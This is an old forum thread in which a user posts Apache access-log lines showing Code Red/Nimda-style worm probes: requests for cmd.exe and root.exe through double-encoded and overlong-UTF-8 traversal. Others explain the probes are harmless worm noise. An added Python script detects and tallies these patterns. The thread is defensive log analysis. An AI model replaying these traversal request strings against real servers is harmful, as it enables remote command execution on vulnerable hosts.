Stats and such down.

MikeJ
Posts: 686
Joined: Fri Oct 26, 2001 9:11 am

Post by MikeJ »


I had a recent h4x attack on my apache server. I would paste the access log, but when I removed apache I lost the log. It was someone making some very fishy GET requests to various Windows services (including the command line) not in my http docs folder. Being the overly cautious freak I am, I blocked port forwarding to port 80 on my router and took down my httpd indefinitely. I can still do stats I suppose, but I'll have to upload them...

The IP seems to be a PacBell DSL user. It's the same subnet host fagpot (previous h4x0r of ;0 channel) has, but I checked; it's not him.

*** Looking up 64.166.157.125
*** Resolved 64.166.157.125 to adsl-64-166-157-125.dsl.snfc21.pacbell.net

I'm probably overreacting, but better safe than sorry. I don't think my system was compromised.


Lythium
Posts: 95
Joined: Tue Aug 28, 2001 7:49 am

Post by Lythium »


lol.. dood, that's Code Red still in effect. All of my apache server logs are flooded with the cmd.exe and _vti_private requests. It is nothing to worry about and does not affect apache. They are coming from a PacBell user because the worm attacks its local subnet. It gets spread to other subnets because people who visit an IIS-powered site spread it to the next IIS-powered site they go to. You have no worries of hax; if you want to cut out most of the spammed logs, block port 80 from everyone in your subnet.
Or if you would like I will donate shell space on irc.semicolon-zero.com for you to update.


nemo
Posts: 325
Joined: Tue Aug 28, 2001 3:30 pm

Post by nemo »
Group: admin
Posts: 133
Joined: Feb. 2002

congrats


MikeJ
Posts: 686
Joined: Fri Oct 26, 2001 9:11 am

Post by MikeJ »
Group: admin
Posts: 133
Joined: Feb. 2002

congrats

:confused:


MikeJ
Posts: 686
Joined: Fri Oct 26, 2001 9:11 am

Post by MikeJ »


64.166.157.125 - - [24/Mar/2002:01:08:58 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
64.166.157.125 - - [24/Mar/2002:01:08:59 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
64.166.157.125 - - [24/Mar/2002:01:09:03 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
64.166.157.125 - - [24/Mar/2002:01:09:07 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
64.166.157.125 - - [24/Mar/2002:01:09:08 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
64.166.157.125 - - [24/Mar/2002:01:09:08 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
64.166.157.125 - - [24/Mar/2002:01:09:58 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
64.166.157.125 - - [24/Mar/2002:01:10:08 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
64.166.157.125 - - [24/Mar/2002:01:10:19 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:19 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:23 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:23 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:24 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
64.166.157.125 - - [24/Mar/2002:01:10:24 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
64.166.157.125 - - [24/Mar/2002:01:10:25 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
64.166.157.125 - - [24/Mar/2002:01:10:25 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303

Well, thanks for the tips lyth, stats will be back up ASAP :D
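The requests above are the Code Red / Nimda style IIS probes Lythium describes: every one asks for cmd.exe or root.exe through some traversal encoding, and every one got a 404 or 400 from Apache. As an added example (not code from this thread), the Python below runs a small detector over a constructed copy of a few of those log lines, groups the probes by source address, counts any that the server actually served with a 2xx (the case that would need a real look), and works out the /24 Lythium suggests blocking at the router; the 10.0.0.7 entry is a made-up benign request it must ignore.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: five of the access log lines quoted in the thread plus
# one benign request (made up) that the detector must not flag.
SAMPLE_LOG = """\
64.166.157.125 - - [24/Mar/2002:01:08:58 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
64.166.157.125 - - [24/Mar/2002:01:09:03 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
64.166.157.125 - - [24/Mar/2002:01:09:08 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
64.166.157.125 - - [24/Mar/2002:01:10:19 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:24 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
10.0.0.7 - - [24/Mar/2002:01:12:00 -0800] "GET /stats/index.html HTTP/1.0" 200 4821
"""

# Apache common log format: ip ident user [time] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Signatures of the IIS worm probes seen above: a request for a command shell,
# plus the double-encoded and overlong-UTF-8 traversals those worms used to reach it.
INDICATORS = {
    "iis_cmd_shell": re.compile(r"/(cmd|root)\.exe", re.I),
    "double_encoded_traversal": re.compile(r"%25(5c|2f)|%%35%63|%%35c", re.I),
    "overlong_utf8_traversal": re.compile(r"%c[01]%[0-9a-f]{2}", re.I),
}

def classify(path):
    """Return the names of the indicators matching one request path."""
    return {name for name, rx in INDICATORS.items() if rx.search(path)}

def summarize(log_text):
    """Per-source summary: probe count, indicators seen, how many probes got a
    2xx (meaning the server actually served one), and the /24 to block."""
    report = defaultdict(lambda: {"probes": 0, "indicators": set(), "served": 0})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        hits = classify(m["path"]) if m else set()
        if not hits:
            continue  # unparsable or benign line: nothing to report
        entry = report[m["ip"]]
        entry["probes"] += 1
        entry["indicators"] |= hits
        entry["served"] += int(m["status"].startswith("2"))
    for ip, entry in report.items():
        entry["block_subnet"] = str(ipaddress.ip_network(f"{ip}/24", strict=False))
    return dict(report)
```

A `served` count of zero, as with every line in this thread, confirms Lythium's point that the probes never hit anything Apache would execute.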


Lythium
Posts: 95
Joined: Tue Aug 28, 2001 7:49 am

Post by Lythium »

Block port 80 from 64.166.157.* and it'll almost be completely stopped.

JFK
Posts: 860
Joined: Mon Dec 03, 2001 11:06 am

Post by JFK »

kick his ass seabass
